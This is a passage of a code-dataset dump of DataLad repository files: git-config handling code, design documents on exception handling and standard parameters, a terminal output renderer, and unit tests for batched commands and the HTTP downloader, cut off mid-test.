None:\n return default\n else:\n raise e\n\n #\n # Modify configuration (proxy respective git-config call)\n #\n @_scope_reload\n def _run(self, args, scope=None, reload=False, **kwargs):\n \"\"\"Centralized helper to run \"git config\" calls\n\n Parameters\n ----------\n args : list\n Arguments to pass for git config\n %s\n **kwargs\n Keywords arguments for Runner's call\n \"\"\"\n if scope:\n args = self._get_location_args(scope) + args\n if '-l' in args:\n # we are just reading, no need to reload, no need to lock\n out = self._runner.run(self._config_cmd + args, **kwargs)\n return out['stdout'], out['stderr']\n\n # all other calls are modifications\n if '--file' in args:\n # all paths we are passing are absolute\n custom_file = Path(args[args.index('--file') + 1])\n custom_file.parent.mkdir(exist_ok=True)\n lockfile = None\n if self._repo_dot_git and ('--local' in args or '--file' in args):\n # modification of config in a dataset\n lockfile = self._repo_dot_git / 'config.dataladlock'\n else:\n # follow pattern in downloaders for lockfile location\n lockfile = Path(self.obtain('datalad.locations.locks')) \\\n / 'gitconfig.lck'\n\n with ConfigManager._run_lock, InterProcessLock(lockfile, logger=lgr):\n out = self._runner.run(self._config_cmd + args, **kwargs)\n\n if reload:\n self.reload()\n # this function is only used to modify config. If any manager\n # has modified the global scope, and is not itself the global\n # manager, we reload that one too in order to avoid stale\n # configuration reports\n if scope == 'global' and self is not datalad.cfg:\n datalad.cfg.reload()\n return out['stdout'], out['stderr']\n\n def _get_location_args(self, scope, args=None):\n if args is None:\n args = []\n cfg_labels = ('branch', 'local', 'global', 'override')\n if scope not in cfg_labels:\n raise ValueError(\n \"unknown configuration label '{}' (not in {})\".format(\n scope, cfg_labels))\n if scope == 'branch':\n if not self._repo_pathobj:\n raise ValueError(\n 'ConfigManager cannot store configuration to dataset, '\n 'none specified')\n dataset_cfgfile = self._repo_pathobj / DATASET_CONFIG_FILE\n args.extend(['--file', str(dataset_cfgfile)])\n elif scope == 'global':\n args.append('--global')\n elif scope == 'local':\n args.append('--local')\n return args\n\n @_scope_reload\n @_where_to_scope\n def add(self, var, value, scope='branch', reload=True):\n \"\"\"Add a configuration variable and value\n\n Parameters\n ----------\n var : str\n Variable name including any section like `git config` expects them, e.g.\n 'core.editor'\n value : str\n Variable value\n %s\"\"\"\n if scope == 'override':\n from datalad.utils import ensure_list\n val = ensure_list(self.overrides.pop(var, None))\n val.append(value)\n self.overrides[var] = val[0] if len(val) == 1 else val\n if reload:\n self.reload(force=True)\n return\n\n self._run(['--add', var, value], scope=scope, reload=reload,\n protocol=StdOutErrCapture)\n\n @_scope_reload\n @_where_to_scope\n def set(self, var, value, scope='branch', reload=True, force=False):\n \"\"\"Set a variable to a value.\n\n In opposition to `add`, this replaces the value of `var` if there is\n one already.\n\n Parameters\n ----------\n var : str\n Variable name including any section like `git config` expects them, e.g.\n 'core.editor'\n value : str\n Variable value\n force: bool\n if set, replaces all occurrences of `var` by a single one with the\n given `value`. Otherwise raise if multiple entries for `var` exist\n already\n %s\"\"\"\n if scope == 'override':\n self.overrides[var] = value\n if reload:\n self.reload(force=True)\n return\n\n from datalad.support.gitrepo import to_options\n\n self._run(to_options(replace_all=force) + [var, value],\n scope=scope, reload=reload, protocol=StdOutErrCapture)\n\n @_scope_reload\n @_where_to_scope\n def rename_section(self, old, new, scope='branch', reload=True):\n \"\"\"Rename a configuration section\n\n Parameters\n ----------\n old : str\n Name of the section to rename.\n new : str\n Name of the section to rename to.\n %s\"\"\"\n if scope == 'override':\n self.overrides = {\n (new + k[len(old):]) if k.startswith(old + '.') else k: v\n for k, v in self.overrides.items()\n }\n if reload:\n self.reload(force=True)\n return\n\n self._run(['--rename-section', old, new], scope=scope, reload=reload)\n\n @_scope_reload\n @_where_to_scope\n def remove_section(self, sec, scope='branch', reload=True):\n \"\"\"Rename a configuration section\n\n Parameters\n ----------\n sec : str\n Name of the section to remove.\n %s\"\"\"\n if scope == 'override':\n self.overrides = {\n k: v\n for k, v in self.overrides.items()\n if not k.startswith(sec + '.')\n }\n if reload:\n self.reload(force=True)\n return\n\n self._run(['--remove-section', sec], scope=scope, reload=reload)\n\n @_scope_reload\n @_where_to_scope\n def unset(self, var, scope='branch', reload=True):\n \"\"\"Remove all occurrences of a variable\n\n Parameters\n ----------\n var : str\n Name of the variable to remove\n %s\"\"\"\n if scope == 'override':\n self.overrides.pop(var, None)\n if reload:\n self.reload(force=True)\n return\n\n # use unset all as it is simpler for now\n self._run(['--unset-all', var], scope=scope, reload=reload)\n\n\ndef rewrite_url(cfg, url):\n \"\"\"Any matching 'url.<base>.insteadOf' configuration is applied\n\n Any URL that starts with such a configuration will be rewritten\n to start, instead, with <base>. When more than one insteadOf\n strings match a given URL, the longest match is used.\n\n Parameters\n ----------\n cfg : ConfigManager or dict\n dict-like with configuration variable name/value-pairs.\n url : str\n URL to be rewritten, if matching configuration is found.\n\n Returns\n -------\n str\n Rewritten or unmodified URL.\n \"\"\"\n insteadof = {\n # only leave the base url\n k[4:-10]: v\n for k, v in cfg.items()\n if k.startswith('url.') and k.endswith('.insteadof')\n }\n\n # all config that applies\n matches = {\n key: v\n for key, val in insteadof.items()\n for v in (val if isinstance(val, tuple) else (val,))\n if url.startswith(v)\n }\n # find longest match, like Git does\n if matches:\n rewrite_base, match = sorted(\n matches.items(),\n key=lambda x: len(x[1]),\n reverse=True,\n )[0]\n if sum(match == v for v in matches.values()) > 1:\n lgr.warning(\n \"Ignoring URL rewrite configuration for '%s', \"\n \"multiple conflicting definitions exists: %s\",\n match,\n ['url.{}.insteadof'.format(k)\n for k, v in matches.items()\n if v == match]\n )\n else:\n url = '{}{}'.format(rewrite_base, url[len(match):])\n return url\n\n\n# for convenience, bind to class too\nConfigManager.rewrite_url = rewrite_url\n\n#\n# Helpers for bypassing git-config when _writing_ config items,\n# mostly useful when a large number of changes needs to be made\n# and directly file manipulation without a safety net is worth\n# the risk for performance reasons.\n#\n\ndef quote_config(v):\n \"\"\"Helper to perform minimal quoting of config keys/value parts\n\n Parameters\n ----------\n v : str\n To-be-quoted string\n \"\"\"\n white = (' ', '\\t')\n comment = ('#', ';')\n # backslashes need to be quoted in any case\n v = v.replace('\\\\', '\\\\\\\\')\n # must not have additional unquoted quotes\n v = v.replace('\"', '\\\\\"')\n if v[0] in white or v[-1] in white or any(c in v for c in comment):\n # quoting the value due to leading/trailing whitespace\n # or occurrence of comment char\n v = '\"{}\"'.format(v)\n return v\n\n\ndef write_config_section(fobj, suite, name, props):\n \"\"\"Write a config section with (multiple) settings.\n\n Parameters\n ----------\n fobj : File\n Opened target file\n suite : str\n First item of the section name, e.g. 'submodule', or\n 'datalad'\n name : str\n Remainder of the section name\n props : dict\n Keys are configuration setting names within the section\n context (i.e. not duplicating `suite` and/or `name`, values\n are configuration setting values.\n \"\"\"\n fmt = '[{_suite_} {_q_}{_name_}{_q_}]\\n'\n for p in props:\n fmt += '\\t{p} = {{{p}}}\\n'.format(p=p)\n quoted_name = quote_config(name)\n fobj.write(\n fmt.format(\n _suite_=suite,\n _q_='' if quoted_name.startswith('\"') else '\"',\n _name_=quoted_name,\n **{k: quote_config(v) for k, v in props.items()}))\n\n\ndef warn_on_undefined_git_identity(cfg: ConfigManager):\n \"\"\"Check whether a Git identity is defined, and warn if not\"\"\"\n for cfgkey, envs in (\n ('user.name', ('GIT_AUTHOR_NAME', 'GIT_COMMITTER_NAME')),\n ('user.email', ('GIT_AUTHOR_EMAIL', 'GIT_COMMITTER_EMAIL'))):\n if cfgkey not in cfg \\\n and not any(e in os.environ for e in envs):\n lgr.warning(\n \"It is highly recommended to configure Git before using \"\n \"DataLad. Set both 'user.name' and 'user.email' \"\n \"configuration variables.\"\n )\n break # one warning enough\n" }, { "alpha_fraction": 0.7530511617660522, "alphanum_fraction": 0.7546091675758362, "avg_line_length": 43.77906799316406, "blob_id": "cb9a1620aedd35f3e2ba4b59f24f8d484008b696", "content_id": "5ebf01cae85e5411461707e968fe4f39ba39b41c", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 3851, "license_type": "permissive", "max_line_length": 80, "num_lines": 86, "path": "/docs/source/design/exception_handling.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_design_exception_handling:\n\n******************\nException handling\n******************\n\n.. topic:: Specification scope and status\n\n This specification describes the current implementation target.\n\n\nCatching exceptions\n===================\n\nWhenever we catch an exception in an ``except`` clause, the following rules\napply:\n\n- unless we (re-)raise, the first line instantiates a\n :class:`~datalad.support.exceptions.CapturedException`::\n\n except Exception as e:\n ce = CapturedException(e)\n\n First, this ensures a low-level (8) log entry including the traceback of that\n exception. The depth of the included traceback can be limited by setting the\n ``datalad.exc.str.tb_limit`` config accordingly.\n\n Second, it deletes the frame stack references of the exception and keeps\n textual information only, in order to avoid circular references, where an\n object (whose method raised the exception) isn't going to be picked by the\n garbage collection. This can be particularly troublesome if that object holds\n a reference to a subprocess for example. However, it's not easy to see in what\n situation this would really be needed and we never need anything other than\n the textual information about what happened. Making the reference cleaning a\n general rule is easiest to write, maintain and review.\n\n- if we raise, neither a log entry nor such a\n :class:`~datalad.support.exceptions.CapturedException` instance is to be\n created.\n Eventually, there will be a spot where that (re-)raised exception is caught.\n This then is the right place to log it. That log entry will have the\n traceback, there's no need to leave a trace by means of log messages!\n\n- if we raise, but do not simply reraise that exact same exception, in order to\n change the exception class and/or its message, ``raise from`` must be used!::\n\n except SomeError as e:\n raise NewError(\"new message\") from e\n\n This ensures that the original exception is properly registered as the cause\n for the exception via its ``__cause__`` attribute. Hence, the original\n exception's traceback will be part of the later on logged traceback of the new\n exception.\n\n\nMessaging about an exception\n============================\n\nIn addition to the auto-generated low-level log entry there might be a need to\ncreate a higher-level log, a user message or a (result) dictionary that includes\ninformation from that exception. While such messaging may use anything the\n(captured) exception provides, please consider that \"technical\" details about an\nexception are already auto-logged and generally not incredibly meaningful for\nusers.\n\nFor message creation :class:`~datalad.support.exceptions.CapturedException`\ncomes with a couple of ``format_*`` helper methods, its ``__str__`` provides a\nshort representation of the form ``ExceptionClass(message)`` and its\n``__repr__`` the log form with a traceback that is used for the auto-generated\nlog.\n\nFor result dictionaries :class:`~datalad.support.exceptions.CapturedException`\ncan be assigned to the field ``exception``. Currently, ``get_status_dict`` will\nconsider this field and create an additional field with a traceback string.\nHence, whether putting a captured exception into that field actually has an\neffect depends on whether ``get_status_dict`` is subsequently used with that\ndictionary. In the future such functionality may move into result renderers\ninstead, leaving the decision of what to do with the passed\n:class:`~datalad.support.exceptions.CapturedException` to them. Therefore, even\nif of no immediate effect, enhancing the result dicts accordingly makes sense\nalready, since it may be useful when using datalad via its python interface\nalready and provide instant benefits whenever the result rendering gets such an\nupgrade.\n" }, { "alpha_fraction": 0.7404113411903381, "alphanum_fraction": 0.7431906461715698, "avg_line_length": 36.5, "blob_id": "e466d1886304f840c73b774f443c5160aa400252", "content_id": "52b0ee80ac7d0c18dc478ca23d8e7ecac6cc9ff1", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1799, "license_type": "permissive", "max_line_length": 146, "num_lines": 48, "path": "/docs/source/design/standard_parameters.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_standard_parameters:\n\n*******************\nStandard parameters\n*******************\n\n.. topic:: Specification scope and status\n\n This specification partially describes the current implementation, and partially is a proposal, subject to review and further discussion.\n\nSeveral \"standard parameters\" are used in various DataLad commands.\nThose standard parameters have an identical meaning across the commands they are used in.\nCommands should ensure that they use those \"standard parameters\" where applicable and do not deviate from the common names nor the common meaning.\n\nCurrently used standard parameters are listed below, as well as suggestions on how to harmonize currently deviating standard parameters.\nDeviations from the agreed upon list should be harmonized.\nThe parameters are listed in their command-line form, but similar names and descriptions apply to their Python form.\n\n``-d``/``--dataset``\n A pointer to the dataset that a given command should operate on\n\n``--dry-run``\n Display details about the command execution without actually running the command.\n\n``-f``/``--force``\n Enforce the execution of a command, even when certain security checks would normally prevent this\n\n``-J``/``--jobs``\n Number of parallel jobs to use.\n\n``-m``/``--message``\n A commit message to attach to the saved change of a command execution.\n\n``-r``/``--recursive``\n Perform an operation recursively across subdatasets\n\n``-R``/``--recursion-limit``\n Limit recursion to a given amount of subdataset levels\n\n``-s``/``--sibling-name`` [SUGGESTION]\n The identifier for a dataset sibling (remote)\n\n\nCertain standard parameters will have their own design document.\nPlease refer to those documents for more in-depth information." }, { "alpha_fraction": 0.5799620747566223, "alphanum_fraction": 0.5799620747566223, "avg_line_length": 28.570093154907227, "blob_id": "48becc696914db8b57493abbea7663df7284e44c", "content_id": "8b2ebe6b470e3eeb10c3be553980bf9d9a97b37e", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3164, "license_type": "permissive", "max_line_length": 77, "num_lines": 107, "path": "/datalad/cli/renderer.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "\"\"\"Render results in a terminal\"\"\"\n\nfrom collections import (\n defaultdict,\n)\nimport string\nfrom datalad.ui import ui\n\nNA_STRING = 'N/A' # we might want to make it configurable via config\n\n\nclass nagen(object):\n \"\"\"A helper to provide a desired missing value if no value is known\n\n Usecases\n\n - could be used as a generator for `defaultdict`\n - since it returns itself upon getitem, should work even for complex\n nested dictionaries/lists .format templates\n \"\"\"\n def __init__(self, missing=NA_STRING):\n self.missing = missing\n\n def __repr__(self):\n cls = self.__class__.__name__\n args = str(self.missing) if self.missing != NA_STRING else ''\n return '%s(%s)' % (cls, args)\n\n def __str__(self):\n return self.missing\n\n def __getitem__(self, *args):\n return self\n\n def __getattr__(self, item):\n return self\n\n\ndef nadict(*items):\n \"\"\"A generator of default dictionary with the default nagen\"\"\"\n dd = defaultdict(nagen)\n dd.update(*items)\n return dd\n\n\nclass DefaultOutputFormatter(string.Formatter):\n \"\"\"A custom formatter for default output rendering using .format\n \"\"\"\n # TODO: make missing configurable?\n def __init__(self, missing=nagen()):\n \"\"\"\n Parameters\n ----------\n missing: string, optional\n What to output for the missing values\n \"\"\"\n super(DefaultOutputFormatter, self).__init__()\n self.missing = missing\n\n def _d(self, msg, *args):\n # print(\" HERE %s\" % (msg % args))\n pass\n\n def get_value(self, key, args, kwds):\n assert not args\n self._d(\"get_value: %r %r %r\", key, args, kwds)\n return kwds.get(key, self.missing)\n\n # def get_field(self, field_name, args, kwds):\n # assert not args\n # self._d(\"get_field: %r args=%r kwds=%r\" % (field_name, args, kwds))\n # try:\n # out = string.Formatter.get_field(self, field_name, args, kwds)\n # except Exception as exc:\n # # TODO needs more than just a value\n # return \"!ERR %s\" % exc\n\n\nclass DefaultOutputRenderer(object):\n \"\"\"A default renderer for .format'ed output line\n \"\"\"\n def __init__(self, format):\n self.format = format\n # We still need custom output formatter since at the \"first level\"\n # within .format template all items there is no `nadict`\n self.formatter = DefaultOutputFormatter()\n\n @classmethod\n def _dict_to_nadict(cls, v):\n \"\"\"Traverse datastructure and replace any regular dict with nadict\"\"\"\n if isinstance(v, list):\n return [cls._dict_to_nadict(x) for x in v]\n elif isinstance(v, dict):\n return nadict((k, cls._dict_to_nadict(x)) for k, x in v.items())\n else:\n return v\n\n def __call__(self, x, **kwargs):\n dd = nadict(\n (k, nadict({k_.replace(':', '#'): self._dict_to_nadict(v_)\n for k_, v_ in v.items()})\n if isinstance(v, dict) else v)\n for k, v in x.items()\n )\n\n msg = self.formatter.format(self.format, **dd)\n return ui.message(msg)\n" }, { "alpha_fraction": 0.6053465604782104, "alphanum_fraction": 0.6114096641540527, "avg_line_length": 32.911216735839844, "blob_id": "d2783770d008f0d1bb0248ee967228a6864c27bd", "content_id": "05f4e44944ef53fac907a3fff9c76edab01918fa", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7257, "license_type": "permissive", "max_line_length": 107, "num_lines": 214, "path": "/datalad/tests/test_cmd.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil; coding: utf-8 -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test WitlessRunner\n\"\"\"\nimport sys\nimport unittest.mock\nfrom subprocess import TimeoutExpired\n\nimport pytest\n\nfrom datalad.cmd import (\n BatchedCommand,\n readline_rstripped,\n)\nfrom datalad.cmd import BatchedCommandError\nfrom datalad.runner.tests.utils import py2cmd\nfrom datalad.tests.utils_pytest import (\n assert_equal,\n assert_is_none,\n assert_is_not_none,\n assert_not_equal,\n assert_true,\n)\n\n\ndef test_readline_rstripped_deprecation():\n with unittest.mock.patch(\"datalad.cmd.warnings.warn\") as warn_mock:\n class StdoutMock:\n def readline(self):\n return \"abc\\n\"\n readline_rstripped(StdoutMock())\n warn_mock.assert_called_once()\n\n\ndef test_batched_command():\n bc = BatchedCommand(cmd=[sys.executable, \"-i\", \"-u\", \"-q\", \"-\"])\n response = bc(\"print('a')\")\n assert_equal(response, \"a\")\n response = bc(\"print(2 + 1)\")\n assert_equal(response, \"3\")\n stderr = bc.close(return_stderr=True)\n assert_is_not_none(stderr)\n\n\ndef test_batched_close_abandon():\n # Expect a timeout if the process runs longer than timeout and the config\n # for \"datalad.runtime.stalled-external\" is \"abandon\".\n bc = BatchedCommand(\n cmd=[sys.executable, \"-i\", \"-u\", \"-q\", \"-\"],\n timeout=.1)\n # Send at least one instruction to start the subprocess\n response = bc(\"import time; print('a')\")\n assert_equal(response, \"a\")\n bc.stdin_queue.put(\"time.sleep(2); exit(1)\\n\".encode())\n\n with unittest.mock.patch(\"datalad.cmd._cfg_val\", \"abandon\"):\n bc.close(return_stderr=False)\n assert_true(bc.wait_timed_out is True)\n assert_is_none(bc.return_code)\n\n\[email protected](\"ignore:Exception ignored\")\ndef test_batched_close_timeout_exception():\n while True:\n try:\n # Expect a timeout at BatchedCommand.close() if the process runs\n # longer than timeout and the config for\n # \"datalad.runtime.stalled-external\" is \"abandon\".\n # In most cases the next commands until `bc.close()` will execute\n # faster than `timeout`. If not we just restart the process\n bc = BatchedCommand(\n cmd=[sys.executable, \"-i\", \"-u\", \"-q\", \"-\"],\n timeout=.5,\n exception_on_timeout=True)\n\n # Send at least one instruction to start the subprocess\n response = bc(\"import time; print('a')\")\n assert_equal(response, \"a\")\n\n # Send process to sleep for two seconds to trigger a timeout in\n # bc.close().\n bc.stdin_queue.put(\"time.sleep(2); exit(1)\\n\".encode())\n with unittest.mock.patch(\"datalad.cfg\") as cfg_mock:\n cfg_mock.obtain.return_value = \"abandon\"\n try:\n bc.close()\n pytest.fail(\"bc.close() did not generate a timeout\")\n except TimeoutExpired:\n return\n except TimeoutExpired:\n # Timeout occurred early, try again\n continue\n\n\ndef test_batched_close_wait():\n # Expect a long wait and no timeout if the process runs longer than timeout\n # and the config for \"datalad.runtime.stalled-external\" has its default\n # value.\n bc = BatchedCommand(\n cmd=[sys.executable, \"-i\", \"-u\", \"-q\", \"-\"],\n timeout=.5)\n # Send at least one instruction to start the subprocess\n response = bc(\"import time; print('a')\")\n assert_equal(response, \"a\")\n bc.stdin_queue.put(\"time.sleep(2); exit(2)\\n\".encode())\n bc.close(return_stderr=False)\n assert_true(bc.wait_timed_out is False)\n assert_equal(bc.return_code, 2)\n\n\ndef test_batched_close_ok():\n # Expect a long wait and no timeout if the process runs longer than timeout\n # seconds and the config for \"datalad.runtime.stalled-external\" has its\n # default value.\n bc = BatchedCommand(\n cmd=[sys.executable, \"-i\", \"-u\", \"-q\", \"-\"],\n timeout=2)\n # Send at least one instruction to start the subprocess\n response = bc(\"import time; print('a')\")\n assert_equal(response, \"a\")\n bc.stdin_queue.put(\"time.sleep(.5); exit(3)\\n\".encode())\n bc.close(return_stderr=False)\n assert_true(bc.wait_timed_out is False)\n assert_equal(bc.return_code, 3)\n\n\ndef test_tuple_requests():\n bc = BatchedCommand(\n cmd=py2cmd(\n \"\"\"\nimport time\nimport sys\nprint(f\"{time.time()}:{sys.stdin.readline().strip()}\")\n \"\"\"))\n\n start_time_1, line = bc((\"one\", \"line\")).split(\":\")\n assert_equal(line, \"one line\")\n start_time_2, line = bc((\"end\", \"now\")).split(\":\")\n assert_not_equal(start_time_1, start_time_2)\n assert_equal(line, \"end now\")\n bc.close(return_stderr=False)\n\n\ndef test_batched_restart():\n # Expect that the process is restarted after exit.\n bc = BatchedCommand(\n cmd=py2cmd(\n \"import os\\n\"\n \"import sys\\n\"\n \"print(os.getpid(), sys.stdin.readline().strip())\\n\"))\n\n # Send four lines\n lines = [f\"line-{i}\" for i in range(4)]\n responses = [bc(lines[i]).split() for i in range(4)]\n pid_set = set([int(r[0]) for r in responses])\n assert_equal(len(pid_set), 4)\n response_lines = [r[1] for r in responses]\n assert_equal(lines, response_lines)\n bc.close(return_stderr=False)\n\n\ndef test_command_fail_1():\n # Expect that a failing command raises a CommandError in which the return\n # code and the last successful request is caught, and that the command is\n # restarted when called again\n bc = BatchedCommand(\n cmd=py2cmd(\n \"\"\"\nprint(\"something\")\nexit(3)\n \"\"\"))\n\n # Send something to start the process\n first_request = \"line one\"\n result = bc(first_request)\n assert bc.return_code is None\n assert result == \"something\"\n with pytest.raises(BatchedCommandError) as exception_info:\n bc(\"line two\")\n assert exception_info.value.code == 3\n assert exception_info.value.last_processed_request == first_request\n assert bc.return_code == 3\n\n # Check for restart\n result = bc(first_request)\n assert result == \"something\"\n bc.close(return_stderr=False)\n\n\ndef test_command_fail_2():\n # Expect that a failing command raises a BatchedCommandError in which the\n # return code and the last successful request is caught. In this case the\n # last successful request should be None.\n bc = BatchedCommand(\n cmd=py2cmd(\n \"\"\"\nprint(a*b)\n \"\"\"))\n\n # Send something to start the process\n first_request = \"line one\"\n with pytest.raises(BatchedCommandError) as exception_info:\n _ = bc(first_request)\n assert exception_info.value.code == 1\n assert exception_info.value.last_processed_request is None\n assert bc.return_code == 1\n assert bc.last_request is None\n bc.close(return_stderr=False)\n" }, { "alpha_fraction": 0.6473066806793213, "alphanum_fraction": 0.6574836373329163, "avg_line_length": 35.51361083984375, "blob_id": "71866dd9a8de33b277182a674c3fc3e06ca25084", "content_id": "76d931d3c4a96cd438d49c9b4b5d9f76b164a5d3", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 30854, "license_type": "permissive", "max_line_length": 198, "num_lines": 845, "path": "/datalad/downloaders/tests/test_http.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Tests for http downloader\"\"\"\n\nimport builtins\nimport os\nimport re\nimport time\nfrom calendar import timegm\nfrom os.path import join as opj\n\nfrom datalad.downloaders.tests.utils import get_test_providers\nfrom datalad.support.network import (\n download_url,\n get_url_straight_filename,\n)\nfrom datalad.utils import ensure_unicode\n\nfrom ...support.exceptions import AccessFailedError\nfrom ..base import (\n BaseDownloader,\n DownloadError,\n IncompleteDownloadError,\n NoneAuthenticator,\n)\nfrom ..credentials import (\n LORIS_Token,\n Token,\n UserPassword,\n)\nfrom ..http import (\n HTMLFormAuthenticator,\n HTTPBaseAuthenticator,\n HTTPBearerTokenAuthenticator,\n HTTPDownloader,\n process_www_authenticate,\n)\n\n# BTW -- mock_open is not in mock on wheezy (Debian 7.x)\ntry:\n import httpretty\nexcept (ImportError, AttributeError):\n # Attribute Error happens with newer httpretty and older ssl module\n # https://github.com/datalad/datalad/pull/2623\n class NoHTTPPretty(object):\n __bool__ = lambda s: False\n activate = lambda s, t: t\n httpretty = NoHTTPPretty()\n\nfrom unittest.mock import patch\n\nfrom ...support.exceptions import (\n AccessDeniedError,\n AnonymousAccessDeniedError,\n)\nfrom ...support.network import get_url_disposition_filename\nfrom ...support.status import FileStatus\nfrom ...tests.utils_pytest import (\n SkipTest,\n assert_equal,\n assert_false,\n assert_greater,\n assert_in,\n assert_not_in,\n assert_raises,\n known_failure_githubci_win,\n ok_file_has_content,\n serve_path_via_http,\n skip_if,\n skip_if_no_network,\n swallow_logs,\n swallow_outputs,\n use_cassette,\n with_fake_cookies_db,\n with_memory_keyring,\n with_tempfile,\n with_testsui,\n with_tree,\n without_http_proxy,\n)\nfrom ...utils import read_file\n\n\ndef test_docstring():\n doc = HTTPDownloader.__init__.__doc__\n assert_in(\"\\ncredential: Credential\", doc)\n\n\n# XXX doesn't quite work as it should since doesn't provide context handling\n# I guess... but at least causes the DownloadError ;)\n_builtins_open = builtins.open\n\n\ndef fake_open(write_=None, skip_regex=None):\n class myfile(object):\n \"\"\"file which does nothing\"\"\"\n if write_:\n def write(self, *args, **kwargs):\n write_(*args, **kwargs)\n def close(self):\n pass\n\n def myopen(path, *args, **kwargs):\n if skip_regex and re.search(skip_regex, ensure_unicode(path)):\n return _builtins_open(path, *args, **kwargs)\n else:\n return myfile\n return myopen\n\n\ndef _raise_IOError(*args, **kwargs):\n raise IOError(\"Testing here\")\n\n\ndef test_process_www_authenticate():\n assert_equal(process_www_authenticate(\"Basic\"),\n [\"http_basic_auth\"])\n assert_equal(process_www_authenticate(\"Digest\"),\n [\"http_digest_auth\"])\n assert_equal(process_www_authenticate(\"Digest more\"),\n [\"http_digest_auth\"])\n assert_equal(process_www_authenticate(\"Unknown\"),\n [])\n\n\n@with_tree(tree=[('file.dat', 'abc')])\n@serve_path_via_http\ndef test_HTTPDownloader_basic(toppath=None, topurl=None):\n furl = \"%sfile.dat\" % topurl\n tfpath = opj(toppath, \"file-downloaded.dat\")\n downloader = HTTPDownloader() # no auth/credentials needed\n download = downloader.download\n download(furl, tfpath)\n ok_file_has_content(tfpath, 'abc')\n\n # download() creates leading directories if needed for file targets...\n subdir_tfpath = opj(toppath, \"l1\", \"l2\", \"file-downloaded.dat\")\n download(furl, subdir_tfpath)\n ok_file_has_content(subdir_tfpath, 'abc')\n\n # ... and for directory targets.\n subdir_dirtarget = opj(toppath, \"d1\", \"d2\", \"\")\n download(furl, subdir_dirtarget)\n ok_file_has_content(opj(subdir_dirtarget, \"file.dat\"), \"abc\")\n\n # see if fetch works correctly\n assert_equal(downloader.fetch(furl), 'abc')\n\n # By default should not overwrite the file\n assert_raises(DownloadError, download, furl, tfpath)\n # but be able to redownload whenever overwrite==True\n downloaded_path = download(furl, tfpath, overwrite=True)\n assert_equal(downloaded_path, tfpath)\n ok_file_has_content(tfpath, 'abc')\n\n # Fail with an informative message if we're downloading into a directory\n # and the file name can't be determined from the URL.\n with assert_raises(DownloadError) as cm:\n download(topurl, toppath)\n assert_in(\"File name could not be determined\", str(cm.value))\n\n # Some errors handling\n # XXX obscure mocking since impossible to mock write alone\n # and it still results in some warning being spit out\n # Note: we need to avoid mocking opening of the lock file!\n with swallow_logs(), \\\n patch.object(builtins, 'open', fake_open(write_=_raise_IOError, skip_regex=r'.*\\.lck$')):\n assert_raises(DownloadError, download, furl, tfpath, overwrite=True)\n\n # incomplete download scenario - should have 3 tries\n def _fail_verify_download(try_to_fail):\n try_ = [0]\n _orig_verify_download = BaseDownloader._verify_download\n def _verify_download(self, *args, **kwargs):\n try_[0] += 1\n if try_[0] >= try_to_fail:\n return _orig_verify_download(self, *args, **kwargs)\n raise IncompleteDownloadError()\n return _verify_download\n\n with patch.object(BaseDownloader, '_verify_download', _fail_verify_download(6)), \\\n swallow_logs():\n # how was before the \"fix\":\n #assert_raises(DownloadError, downloader.fetch, furl)\n #assert_raises(DownloadError, downloader.fetch, furl)\n # now should download just fine\n assert_equal(downloader.fetch(furl), 'abc')\n # but should fail if keeps failing all 5 times and then on 11th should raise DownloadError\n with patch.object(BaseDownloader, '_verify_download', _fail_verify_download(7)), \\\n swallow_logs():\n assert_raises(DownloadError, downloader.fetch, furl)\n\n # TODO: access denied scenario\n # TODO: access denied detection\n\n\n@with_tree(tree=[('file.dat', 'abc')])\n@serve_path_via_http\n@with_memory_keyring\ndef test_access_denied(toppath=None, topurl=None, keyring=None):\n furl = topurl + \"file.dat\"\n\n def deny_access(*args, **kwargs):\n raise AccessDeniedError(supported_types=[\"http_basic_auth\"])\n\n def deny_anon_access(*args, **kwargs):\n raise AnonymousAccessDeniedError(supported_types=[\"http_basic_auth\"])\n\n downloader = HTTPDownloader()\n\n # Test different paths that should lead to a DownloadError.\n\n for denier in deny_access, deny_anon_access:\n @with_testsui(responses=[\"no\"])\n def run_refuse_provider_setup():\n with patch.object(downloader, '_download', denier):\n downloader.download(furl)\n assert_raises(DownloadError, run_refuse_provider_setup)\n\n downloader_creds = HTTPDownloader(credential=\"irrelevant\")\n\n @with_testsui(responses=[\"no\"])\n def run_refuse_creds_update():\n with patch.object(downloader_creds, '_download', deny_access):\n downloader_creds.download(furl)\n assert_raises(DownloadError, run_refuse_creds_update)\n\n downloader_noauth = HTTPDownloader(authenticator=NoneAuthenticator())\n\n def run_noauth():\n with patch.object(downloader_noauth, '_download', deny_access):\n downloader_noauth.download(furl)\n assert_raises(DownloadError, 